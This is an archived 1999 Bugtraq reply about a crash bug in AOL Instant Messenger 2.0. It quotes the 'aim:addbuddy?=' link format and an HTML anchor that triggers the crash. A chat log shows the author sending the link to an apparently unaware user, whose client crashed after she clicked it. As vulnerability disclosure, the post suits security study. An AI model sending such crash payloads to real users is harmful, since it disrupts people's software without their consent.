Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
Bugtraq archives for 2nd quarter (Apr-Jun) 1999: Re: AOL Instant Messenger URL Crash

Re: AOL Instant Messenger URL Crash

Daniel Reed (djrNARNIA.N.ML.ORG)
Tue, 20 Apr 1999 16:24:02 -0400

On Mon, 19 Apr 1999, Adam Brown wrote:
) There is a bug in the newer versions of AOL's Instant Messenger that will
) cause the client to crash when exploited.  All builds of version 2.0 that
) I've tested seem to be vulnerable, although I have not done extensive
) version testing.  AOL was notified of this about two weeks ago.  To exploit
) this bug, send a hyperlink in this format: aim:addbuddy?=screenname
I just sent <a href="aim:addbuddy?=screenname">what does this show up as</a>?
to an AOL AIM 2.0.996 user and once she *clicked* on it AIM crashed. I don't
know if you meant to say that the user had to click on it for the client to
crash, or if this is indeed different behaviour. I also just tried it with
"screenname" replaced with first her screenname, and then with mine, again
with no automatic reaction.

(sent from linuxkitty, a naim-0.9.4-parse2 user, to <victim>, an AOL AIM
2.0.996 user)
[15:59:43] linuxkitty: [LINK:href="aim:addbuddy?=screenname":what
does this show up as]?
[16:00:23] Friend <victim> has just logged off :(
[16:03:09] Friend <victim> is now online =)
[16:14:14] linuxkitty: [LINK:href="aim:addbuddy?=<victim>":miaow
miaow] (don't click on that, I'm just testing something)
[16:14:50] linuxkitty: [LINK:href="aim:addbuddy?=linuxkitty":anoth
er test...]

Daniel Reed <nml.org>
Many a false step is made by standing still...